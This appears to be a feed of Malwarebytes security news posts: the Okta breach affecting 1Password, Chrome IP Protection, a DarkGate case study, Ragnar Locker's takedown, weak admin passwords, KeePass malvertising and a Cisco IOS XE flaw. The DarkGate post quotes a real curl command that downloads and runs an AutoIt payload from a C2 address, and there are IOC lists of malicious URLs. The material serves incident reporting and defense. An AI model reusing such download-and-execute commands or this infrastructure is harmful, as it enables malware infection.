IT NEWS

1Password reports security incident after breach at Okta

Password manager 1Password says it’s been affected by a breach at Okta, but it reports no user data has been stolen.

In a security incident report, 1Password says that a member of its IT team received an unexpected email suggesting they had initiated an Okta report of a list of admins. They hadn’t requested it so they reported the email to the security department.

An internal investigation showed unsolicited activity in the Okta environment which was traced to a suspicious IP address. Later it was confirmed that an attacker had accessed 1Password’s Okta environment using administrative privileges. 1Password says it took action straight away:

“We immediately terminated the activity, investigated, and found no compromise of user data or other sensitive systems, either employee-facing or user-facing.”

Okta breach

On Friday, Okta said it spotted an attacker using a stolen credential to access Okta’s support case management system. This allowed them to view files uploaded by certain Okta customers as part of recent support cases.

It’s normal for Okta support to ask customers to upload an HTTP Archive (HAR) file, which allows the team to troubleshoot issues by replicating what’s going on in the browser. As such, a HAR file can contain sensitive data, including cookies and session tokens, that cybercriminals can use to impersonate valid users.

A member of 1Password’s IT team was engaged with Okta support, and at their request, created and uploaded such a HAR file to the Okta Support Portal.

In the early morning hours of Friday, September 29, 2023 an unknown actor used the same Okta session that was used to create the HAR file to access the Okta administrative portal.

If the 1Password incident is a consequence of the same Okta breach, this puts the Okta breach which was discovered by BeyondTrust on October 2, 2023 in a new light as regards to the timeline. BeyondTrust says it had to persist with escalations within Okta until October 19, when Okta security leadership notified BeyondTrust that it had indeed experienced a breach and that BeyondTrust were one of the affected customers.

Okta says it has now notified all impacted customers.

“All customers who were impacted by this have been notified. If you’re an Okta customer and you have not been contacted with another message or method, there is no impact to your Okta environment or your support tickets.”

1Password suspects that the attackers were merely looking for information that would allow them to attack on a larger scale. They tried, for example, to access the IT team member’s user dashboard, but that attempt was blocked by Okta. They also requested a report of administrative users, which was the action that triggered the investigation.

A thorough investigation of the circumstances and the device that was used to upload the HAR file, did not reveal any reasons for the information to be captured. It did reveal which vendor 1Password relies on in a crisis though.

“The IT team member’s macOS laptop that was used is currently offline, and was scanned with the free version of Malwarebytes, which reported no findings.”

It wasn’t until after Okta revealed it’d had a security incident, that 1Password realized that the information was stolen during that incident.

Data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

  • Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
  • Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
  • Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
  • Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.

Malwarebytes Managed Detection and Response (MDR) simply and effectively closes your security resources gap, reduces your risk of unknown threats, and increases your security efficiency exponentially. Malwarebytes MDR staffs highly experienced Tier 2 and Tier 3 analysts who are hands-on with customer endpoints, ensuring critical threats are quickly identified and a thorough response is rapidly deployed.

Want to learn more about MDR? Get a free trial below.

TRY NOW

Google Chrome wants to hide your IP address

Google is working out some kinks in the project formerly known as Gnatcatcher, which will now be known under the more descriptive name “IP Protection.” Which means that Chrome is reintroducing a proposal to hide users’ IP addresses, to make cross-site tracking more difficult.

An Internet Protocol (IP) address is a unique number that’s assigned to your computer when it joins a network. The number acts as your address on the network. In order for two computers to communicate, each must know the other’s address, so that messages go to the right place.

The IP address you use on the Internet is typically the one that your router is given by your ISP (Internet Service Provider). Although the IP address you use isn’t assigned to you permanently it will likely go unchanged until you disconnect or turn off your router. Blocks of IP addresses are assigned geographicaly, so it’s also possible to use them for a form of crude geolocation, accurate to about the nearest city.

Your IP address’s combination of persistence and uniqueness makes it a useful identifier for anyone who wants to track you across multiple websites. It can also be combined with other semi-permanent information from your browser to create an even more accurate “fingerprint”, that identifies you when you browse.

Over time this fingerprint can be used to build up a unique, persistent user profile that can be used for targeted advertising, which many people see as a threat to their privacy.

As a result, some users do not like to reveal their IP address, so they hide it using a proxy server or a VPN. Both proxies and VPNs mask a user’s IP address with one of their own. Only the proxy operator or VPN provider knows the user’s real address.

Google’s IP Protection proposal will use proxies to hide users’ IP addresses.

Because there are some potentially unwanted side-effects, and Google wants to learn as it goes, the feature will be tested and rolled out in multiple phases. In the first phase the feature will use a single Google-owned proxy, will only proxy requests to domains owned by Google, and will only work for users with US-based IP addresses.

Apparently Google wants to test the infrastructure without impacting third-party companies. Domains owned by Google include services like Gmail, but also AdServices. Note that in this phase Google will automatically enroll a small percentage of users, and they must be logged in to Chrome.

In later phases Google plans to  use a chain of two proxies so that neither proxy can see both the origin and destination IP addresses. There are some concerns that will need to be ironed out in the course of the testing phases:

  • Defensibility, since a compromised proxy may be used to deploy attacks.
  • Disruption of existing Denial of Service (DoS) defenses by using the two proxies.
  • Disruption of existing defenses for fraud and invalid traffic detection. For example, depending on the way they work, some block-lists will no longer be effective because the final destination is not detected.

Google expects that this may change plans along the way, and states:

“Long term solutions will evolve and will be shaped in conjunction with the ecosystem. We will collaborate with ISPs, CDNs, third parties, and destination sites towards the end-state of privacy proxies for the web. For instance, ISPs and CDNs are well suited to operate privacy proxies.”

We will keep an eye on how this development takes shape. But, even if I could, I would not sign up for the first phase if I were a user that now uses a VPN to hide their IP address. Because in this phase Google will be able to see your IP address and the one you are visiting, which means you would only be shifting the information gathering from several Google services to one central point.


We don’t just report on privacy—we offer you the option to use it.

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

A week in security (October 16 – October 22)

Battling a new DarkGate malware campaign with Malwarebytes MDR

First publicly reported in 2018, DarkGate is a Windows-based malware with a wide-range of capabilities including credential stealing and remote access to victim endpoints. Until recently, it was only seen being delivered through traditional email malspam campaigns. In late August 2023, however, researchers at Trusec found evidence of a campaign using external Teams messages to deliver the DarkGate Loader.

On September 13th, 2023, the Malwarebytes MDR team spotted the same campaign on a client network.

The Initial Incident

The threat began as a phishing attempt via Microsoft Teams. The attackers sent a malicious ZIP file named “C_onfidential Sign_ificant Company Changes.zip” (the names may vary in different iterations of the attack).

easset upload file88789 284158 ePhishing message sent to targets via Microsoft Teams in the same DarkGate campaign. Image: Truesec

A number of employees clicked on this file believing it to be legitimate. Inside this ZIP file, however, were several malicious shortcut files, or LNK files, that were disguised as PDF documents.

The names of these LNK files included “EMPLOYEES_AFFECTED_BY_TRANSITION.PDF.LNK” and “COMPANY_TRANSFORMATIONS.PDF.LNK“.

The Malicious Command

When employees clicked on these shortcuts, it triggered a malicious command line. Its purpose? To download and run a harmful script from a remote IP address. Fortunately, Malwarebytes EDR recognized this IP as a ‘Known bad’ destination and blocked it.

easset upload file5883 284158 e

Multiple attempts to execute processes such as curl commands

DarkGate Loader – The Culprit

As the MDR team delved deeper into the incident, they discovered that this was not a random attack. It was connected to a known malware attack campaign using Teams phishing to install DarkGate Loader. The use of the curl command is to fetch and deposit malicious files onto the victim’s machine:

"C:WindowsSystem32cmd.exe" /k curl -# -o

"C:Users[Redacted]AppDataLocalTempAutoit3.exe" "

http://5[.]188[.]87[.]58:2351" -o

"C:Users[Redacted]AppDataLocalTempbtbgvbyy.au3"

"http://5[.]188[.]87[.]58:2351/msibtbgvbyy" "C:Users[Redacted]AppDataLocalTempAutoit3.exe"

"C:Users[Redacted]AppDataLocalTempbtbgvbyy.au3" & exit

The malicious command attempts to run an AutoIt script (btbgvbyy.au3). Director of Threat Intelligence Jerome Segura notes the use of AutoIt, a legitimate scripting language, was already present in the very early versions of DarkGate.

easset upload file29226 284158 e

Malwarebytes EDR recognizing suspicious AutoIt activity

easset upload file5210 284158 e

Infected system exhibiting Indicators of Compromise (IOCs)

Recognizing the gravity of the situation, the team began collecting Indicators of Compromise (IOCs). This included hashes of the ZIP file, its contents, and samples of the malevolent script initiated by the shortcuts.

Actions Taken

Swift action was taken by isolating the affected machines. Although Malwarebytes EDR had already blocked the malicious IP, the MDR team took extra precautions, ensuring that no persistence mechanisms were present on the endpoints, which could have given attackers a backdoor to the system.

The MDR team also suggested blocking the download of files from external accounts in Microsoft Teams, which was the primary attack vector in this campaign.

Lessons from the Incident

By using a combination of evasion techniques, the threat actors behind these campaigns are able to distribute DarkGate with a minimal system footprint. If the infection had continued, the company could have faced potential data breaches, operational disruptions, financial losses, and more.

Fortunately, the collaborative efforts of Malwarebytes MDR, EDR, and the customer successfully mitigated the DarkGate malware and safeguarded the customer’s digital environment against possible reinfection.

Learn more about how Malwarebytes MDR today can help secure your organization: https://try.malwarebytes.com/mdr-consultation-new/

Get a Malwarebytes MDR quote

Read other front-line stories about how Malwarebytes MDR analysts do threat hunting on customer networks:

Tracking down a trojan: An inside look at threat hunting in a corporate network

Understanding ransomware reinfection: An MDR case study

Indicators of Compromise (IoC)

File Details:

Filename: C_onfidential Sign_ificant Company Changes.zip

Reported At: 09/13/2023 9:57:56 AM

Network Indicators:

C2 IP Address: 5[.]188[.]87[.]58

Malicious URLs:

http://5[.]188[.]87[.]58:2351

http://5[.]188[.]87[.]58:2351/msibtbgvbyy

MGM attack is too late a wake-up call for businesses, says James Fair: Lock and Code S04E22

This week on the Lock and Code podcast…

In September, the Las Vegas casino and hotel operator MGM Resorts became a trending topic on social media… but for all the wrong reasons. A TikTok user posted a video taken from inside the casino floor of the MGM Grand—the company’s flagship hotel complex near the southern end of the Las Vegas strip—that didn’t involve the whirring of slot machines or the sirens and buzzers of sweepstake earnings, but, instead, row after row of digital gambling machines with blank, non-functional screens. That same TikTok user commented on their own post that it wasn’t just errored-out gambling machines that were causing problems—hotel guests were also having trouble getting into their own rooms.

As the user said online about their own experience: “Digital keys weren’t working. Had to get physical keys printed. They doubled booked our room so we walked in on someone.”

The trouble didn’t stop there.

A separate photo shared online allegedly showed what looked like a Walkie-Talkie affixed to an elevator’s handrail. Above the device was a piece of paper and a message written by hand: “For any elevator issues, please use the radio for support.”  

As the public would soon learn, MGM Resorts was the victim of a cyberattack, reportedly carried out by a group of criminals called Scattered Spider, which used the ALPHV ransomware.

It was one of the most publicly-exposed cyberattacks in recent history. But just a few days before the public saw the end result, the same cybercriminal group received a reported $15 million ransom payment from a separate victim situated just one and a half miles away.

On September 14, Caesar’s Entertainment reported in a filing with the US Securities and Exchange Commission that it, too, had suffered a cyber breach, and according to reporting from CNBC, it received a $30 million ransom demand, which it then negotiated down by about 50 percent.

The social media flurry, the TikTok videos, the comments and confusion from customers, the ghost-town casino floors captured in photographs—it all added up to something strange and new: Vegas was breached. 

But how? 

Though follow-on reporting suggests a particularly effective social engineering scam, the attacks themselves revealed a more troubling, potential vulnerability for businesses everywhere, which is that a company’s budget—and its relative ability to devote resources to cybersecurity—doesn’t necessarily insulate it from attacks. 

Today on the Lock and Code podcast with host David Ruiz, we speak with James Fair, senior vice president of IT Services at the managed IT services company Executech, about whether businesses are taking cybersecurity seriously enough, which industries he’s seen pushback from for initial cybersecurity recommendations (and why), and the frustration of seeing some companies only take cybersecurity seriously after a major attack. 

“How many do we have to see? MGM got hit, you guys. Some of the biggest targets out there—people who have more cybersecurity budget than people can imagine—got hit. So, what are you waiting for?”

Tune in today to listen to the full conversation.

You can also find us on Apple PodcastsSpotify, and Google Podcasts, plus whatever preferred podcast platform you use.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Ragnar Locker ransomware group taken down

Even though it had a long run for a ransomware group, it seems the bell might be tolling for Ragnar Locker. On October 19, 2023, the group’s leak site  was seized by an international group of law enforcement agencies.

seizure notice on Ragnar Locker's leak site

The take down action was carried out between 16 and 20 October. During the action searches were conducted in Czechia, Spain and Latvia. The main target, suspected of being a developer of the Ragnar group, has been brought in front of the examining magistrates of the Paris Judicial Court.

The action was coordinated at international level by Europol and Eurojust. The ransomware group’s infrastructure was also seized in the Netherlands, Germany and Sweden and the associated data leak website was taken down in Sweden.

Ragnar Locker started its operations at the end of 2019, making it unusually long lived. Most ransomware groups do not survive that long, mostly due to internal struggles or a takedown such as this one.

Based on known attacks, as shown in out monthly ransomware reviews, Ragnar Locker was number 15 on the list of the most active ransomware groups over the last twelve months. (A known attack is one where a victim’s details are posted on a ransomware group’s leak website becasue they didn’t pay a ransom. The number of known attacks probably represents 50%-75% of the total attacks.)

graph showing know attacks by Ragnar Locker over the last year
Known attacks by Ragnar Locker, October 2022 – September 2023

Ragnar Locker has been called out for specifically targeting the energy sector—after attacks on Energias de Portugal (EDP) and Greek gas operator DESFA—but at Malwarebytes we never noticed any specialization. In the chart below, you can see it that across 36 known attacks in the last 12 months it attacked 15 different sectors.

known attacks by Ragnar Locker by vertical

Ragnar Locker’s known attacks by industry sector, October 2022 – September 2023

In 2022, the FBI published a flash alert to warn that the Ragnar Locker ransomware gang had breached the networks of at least 52 organizations across 10 critical infrastructure sectors.

One of the biggest upsets occurred when Ragnar Locker published information it had stolen from police computers in Zwijndrecht, a municipality in the province of Antwerp, Belgium) The stolen information included police records about license plates, speeding tickets, and at least one case of child abuse. Other high profile victims include Campari and Capcom.

Ragnar Locker is not a Ransomware-as-a-Service (RaaS) that was constantly advertising for new affiliates, so we assume it worked with a pretty constant group of people. It also seemed capable of developing new attack methods, like the ESXi encryptor that was recently deployed by the Dark Angels group in an attack on Industrial giant Johnson Controls.

Ragnar Locker specifically targeted software commonly used by managed service providers (MSPs) to prevent its attacks from being detected and stopped. It also used the double extortion method of encryption and data theft pretty much from the start

The questionable honor of being the last victim posted on the leak site was IP international presence on October 6, 2023. There is always the chance that some victims are now left without an option to negotiate with the ransomware group.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
  • Prevent intrusions. Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

The hot topics from Europe’s largest trade fair for IT security

IT-SA Expo & Congress claims to be Europe’s largest trade fair for IT security. And it really covers a wide range of security and security-related products and services. The event takes place in Nuremberg, Germany and provides an opportunity for vendors to show themselves to the public, create new contacts and leads, and check out what the competition is up to.

As one of the Malwarebytes representatives, I had the opportunity to walk around, talk to people, and listen to some of the talks given by representatives from throughout the industry.

All in all, I observed a lot of talks, and of the ones I heard that weren’t about promoting a product, most of them roughly fell into 3 categories: Ransomware, AI/ChatGPT, and NIS2.

Ransomware

Ransomware is still considered the most alarming cybersecurity threat to businesses, which isn’t surprising given that Germany is regularly in the top five most targeted countries in our monthly ransomware reviews, which often makes it the first country on the list where English is not the primary language. As one of Europe’s leading economies there is some serious money to be made by the cybercriminals.

The focus in ransomware developments is the shift in attention to the earlier stages of the attacks. By the time files are being encrypted, attackers have probably already been in situ for a while, moving laterally through the victim’s network and stealing their data. Some ransomware gangs even stop here and don’t proceed to encryption anymore. Encryption routines are easy to detect and stop, but spotting the suspicious behavior the precedes it turns out to be much harder.

AI and ChatGPT

AI, and ChatGPT in particular, are very much at the forefront of everyone’s attention. Mostly because we are curious, maybe even a bit anxious, to see what the future will bring.

As distinguished researcher Mikko Hyppönen explained, it’s not the tool we should be worried about, but the intentions of its users. Yes, artificial intelligence can find zero-days. Is that great because we can use to find vulnerabilities that need patching, or is it awful, because it will allow the cybercriminals to find vulnerabilities and exploit them?

Mikko slide about AI pros and cons

And another researcher told us that after the introduction of ChatGPT and its peers, they noticed a 27% increase in the linguistic complexity of phishing emails. The times where we could spot the phisher by looking at the number of typo’s might be behind us. LLM’s allow phishers to create long, error-free emails that first gain the trust of the target and then get them to open an attachment or click a link.

NIS2

The NIS2 Directive is EU-wide legislation on cybersecurity. Its purpose is to heighten the security levels for critical infrastructure in the European Union.

Businesses identified by the member states as operators of essential services in sectors such as energy, transport, water, banking, financial market infrastructures, healthcare, and digital infrastructure, will have to take appropriate security measures and notify relevant national authorities of serious incidents. Key digital service providers, such as search engines, cloud computing services, and online marketplaces, will have to comply with the security and notification requirements under the directive.

NIS2 has to be turned into laws by EU member states, which means it can be incorporated differently in every member state to functionally harmonize with local legislation. In Germany the third draft bill was presented in September 2023. So, while it’s slowly shaping up there is nothing definite about what will be included in the final draft.

A few things have been in all three drafts and seem likely to survive the cut. As a result, there was a lot of speculation, but nobody exactly knows what is going to happen. The NIS Implementation Act is scheduled to be announced in March 2024 and then come into force in October 2024 if everything goes as planned.

To anyone who I had the pleasure of meeting at IT-SA, I hope you had a successful event and let’s meet again some time.


Malwarebytes Managed Detection and Response (MDR) simply and effectively closes your security resources gap, reduces your risk of unknown threats, and increases your security efficiency exponentially. Malwarebytes MDR staffs highly experienced Tier 2 and Tier 3 analysts who are hands-on with customer endpoints, ensuring critical threats are quickly identified and a thorough response is rapidly deployed.

Want to learn more about MDR? Get a free trial below.

TRY NOW

IT administrators’ passwords are awful too

The key is under the doormat by the front door.

The administrator password is “admin”.

These are easy to remember clues when you are providing entrance to someone you trust. The problem is that they are also enormously easy to guess. It’s where we would expect an unwanted visitor to check first, before breaking out the toolbox.

Random end users could be forgiven for relying on such obviously insecure habits, but what about professionals who job it is to keep things safe and secure? Research has revealed that IT administrators are just as likely to do the tech equivalent of putting the key under the mat as end users, with both groups using similarly predictable passwords.

The top 10 passwords assembled by the researchers looks like this:

    1. Admin
    2. 123456
    3. 12345678
    4. 1234
    5. Password
    6. 123
    7. 12345
    8. admin123
    9. 123456789
    10. adminisp

The first 10 entries in a password dictionary we found online:

    1. 123456
    2. Password
    3. 12345678
    4. Qwerty
    5. 12345
    6. 123456789
    7. Letmein
    8. 1234567
    9. Football
    10. iloveyou

Part of the popularity of passwords like admin, password, and 12345 might lie in the fact that they are often used as defaults. You know, the ones used during an initial setup that are supposed to be changed. Default passwords, even if they are more complex, have the huge disadvantage that they can be found by simply looking up the product documentation in a search engine.

For that reason, using default passwords is considered a serious security risk. There are three different types of password attack that will discover passwords like admin or 12345 almost immediately:

  • Password spraying uses short lists of the most well known passwords on as many computers as possible.
  • Credential stuffing looks for reused passwords by trying usernames and passwords from breached websites.
  • Dictionary attacks look for passwords by trying password dictionaries of common words.

Do you see the resemblance? Added with a little knowledge about the required length of the password, the attacker is going to have a field day. They wouldn’t even need a program to try these options. This can easily enough be done manually.

There is one glimmer of hope remaining after we read this. We hope that IT administrators know that passwords alone are not secure enough for important assets and will have added an extra layer of security in the form of multi-factor authentication (MFA).

As I wrote before, and will probably repeat in the future, multi-factor authentication is so much more secure, and with that a lot more forgiving, than passwords alone. I would not recommend it, but writing down your password on a Post-It and pasting it on your monitor won’t do an attacker any good if you have set up your MFA properly. Also not recommended, but you could even re-use your weak password on every site, as long as all those accounts were protected with the most effective form of MFA.

So, dear IT administrators, we can only hope that MFA is your defense strategy. But you should realize that by making your passwords so easy to guess, it doesn’t really deserve to be categorized as “multi” factor authentication, because you are giving the first factor away.

Your access rights are something that any cybercriminal would love to take over. Think of what they might be able to do, by being able to log in as you, so don’t give them that chance. Don’t be the weak link. While end users sometimes complain about the hassle of using a password manager, they shouldn’t really be a problem for you. Be a shining example.


Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Clever malvertising attack uses Punycode to look like KeePass’s official website

Threat actors are known for impersonating popular brands in order to trick users. In a recent malvertising campaign, we observed a malicious Google ad for KeePass, the open-source password manager which was extremely deceiving. We previously reported on how brand impersonations are a common occurrence these days due to a feature known as tracking templates, but this attack used an additional layer of deception.

The malicious actors registered a copycat internationalized domain name that uses Punycode, a special character encoding, to masquerade as the real KeePass site. The difference between the two sites is visually so subtle it will undoubtably fool many people.

We have reported this incident to Google but would like to warn users that the ad is still currently running.

Malicious ad for KeePass

The malicious advert shows up when you perform a Google search for ‘keepass’, the popular open-source password manager. The ad is extremely deceiving as it features the official Keepass logo, URL and is featured before the organic search result for the legitimate website.

By simply looking at the ad, you would have no idea that it is malicious. 

easset upload file64302 284125 e

Figure 1: Malicious ad for KeePass followed by legitimate organic search result

People who click on the ad will be redirected via a cloaking service that is meant to filter sandboxes, bots and anyone not deemed to be a genuine victim. The threat actors have set up a temporary domain at keepasstacking[.]site that performs the conditional redirect to the final destion:

easset upload file55229 284125 e

Figure 2: Network traffic showing the sequence of redirects upon clicking the ad

ķeepass.info

Looking at the network traffic log above, we can see that the destination site uses Punycode, a special encoding to convert Unicode characters to ASCII. The deception is complete for users who may want to verify that they are on the right website.

easset upload file60928 284125 e

Figure 3: The fake KeePass site with a barely noticeable different font

While it is barely noticeable, there is a small character under the ‘k’. We can confirm it by converting the internationalized domain name xn--eepass-vbb[.]info to ķeepass[.]info:

easset upload file47057 284125 e

Figure 4: Converting Punycode to ASCII

Decoy site links to malicious download

While the decoy site is not an exact replica of the real one, it still looks very convincing:

easset upload file95688 284125 e

Figure 5: Comparing the legitimate site (left) with the fake one (right)

Victims wanting to download KeePass will retrieve a malicious .msix installer that is digitally signed:

easset upload file17828 284125 e

Figure 6: The malicious MSIX installer showing a valid digital signature

Extracting the installer’s content reveals malicious PowerShell code that belongs to the FakeBat malware family:

easset upload file80879 284125 e

Figure 7: The contents of the MSIX installer

This script communicates with the malware’s command and control server to advertise the new victim before downloading a payload that sets the stage for future recon by human threat actors.

easset upload file5791 284125 e

Figure 8: Process view showing execution of the MSIX installer

A more sophisticated threat

While Punycode with internationalized domain names has been used for years by threat actors to phish victims, it shows how effective it remains in the context of brand impersonation via malvertising. Users are first deceived via the Google ad that looks entirely legitimate and then again via a lookalike domain.

As we have noted recently, malvertising via search engines is getting more sophisticated. For end users this means that it has become very important to pay close attention where you download programs from and where you should avoid them. In a business environment, we recommend IT admins provide internal repositories where employees can retrieve software installers safely.

Indicators of Compromise

Ad domain/redirect

keepasstacking[.]site

Fake KeePass site

xn--eepass-vbb[.]info

Malicious KeePass download URL

xn--eepass-vbb[.]info/download/KeePass-2.55-Setup.msix

Malicious KeePass installer

181626fdcff9e8c63bb6e4c601cf7c71e47ae5836632db49f1df827519b01aaa

Malware C2

756-ads-info[.]xyz

Payload

refreshmet[.]com/Package.tar.gpg

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Cisco IOS XE vulnerability widely exploited in the wild

An authentication bypass affecting Cisco IOS X was disclosed on October 16, 2023. Researchers have found since then that the vulnerability is widely being exploited in the wild to help install implants on affected switches and routers.

Cisco IOS XE is a universally deployed Internetworking Operating System (IOS) that enables model-driven programmability, application hosting, and configuration management, helping to automate day-to-day tasks.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The vulnerability at hand is listed as:

CVE-2023-20198 (CVSS score 10 out of 10: Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.

What Cisco failed to mention was that thousands of internet-facing IOS XE systems have been implanted. The researchers scanned internet-facing Cisco IOS XE web interfaces and found thousands of implanted hosts.

Cisco has also yet to publish a list of affected devices, but if you are using Cisco switches, routers or Wireless LAN Controllers, you should assume they are vulnerable.

The implants that were found enable the attacker to communicate with the compromised device and use that ability to monitor web traffic, perform lateral movement in the network, or use them for a machine-in-the-middle attack.

The Cisco Talos team discovered there were malicious activities correlated with this vulnerability as early as September 18, 2023.

Mitigation

This vulnerability affects Cisco IOS XE Software if the web UI feature is enabled. The web UI feature is enabled through the ip http server or ip http secure-server commands.

To determine whether the HTTP Server feature is enabled for a system, log in to the system and use the show running-config | include ip http server|secure|active command in the CLI to check for the presence of the ip http server command or the ip http secure-server command in the global configuration. If either command is present, the HTTP Server feature is enabled for the system.

Cisco strongly recommends that customers disable the HTTP Server feature on all internet-facing systems. To disable the HTTP Server feature, use the no ip http server or no ip http secure-server command in global configuration mode. If both the HTTP server and HTTPS server are in use, both commands are required to disable the HTTP Server feature.

While a patch is not yet available, it is advisable to protect your organization by disabling the web interface and removing all management interfaces from the internet immediately. Which is always good advice.

The Cybersecurity & Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities Catalog, based on the evidence of active exploitation. This means all Federal Civilian Executive Branch Agencies (FCEB) have to verify that instances of Cisco IOS XE Web UI are in compliance with BOD 23-02 (Mitigating the Risk from Internet-Exposed Management Interfaces) and apply mitigations per Cisco’s instructions. For affected products (Cisco IOS XE Web UI exposed to the internet or to untrusted networks), organizations must follow Cisco’s instructions to determine if a system may have been compromised and immediately report positive findings to CISA before October 20,2023.

Organizations should look for unexplained or newly created users on devices as evidence of potentially malicious activity relating to this threat. One method to identify if the implant is present is to run the following command against the device, where the “{DEVICEIP}” portion is a placeholder for the IP address of the device to check: 

curl -k -X POST “https://{DEVICEIP}/webui/logoutconfirm.html?logon_hash=1”

Note: The above check should use the HTTP scheme if the device is only configured for an insecure web interface. If the request returns a hexadecimal string, the implant is present.


We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.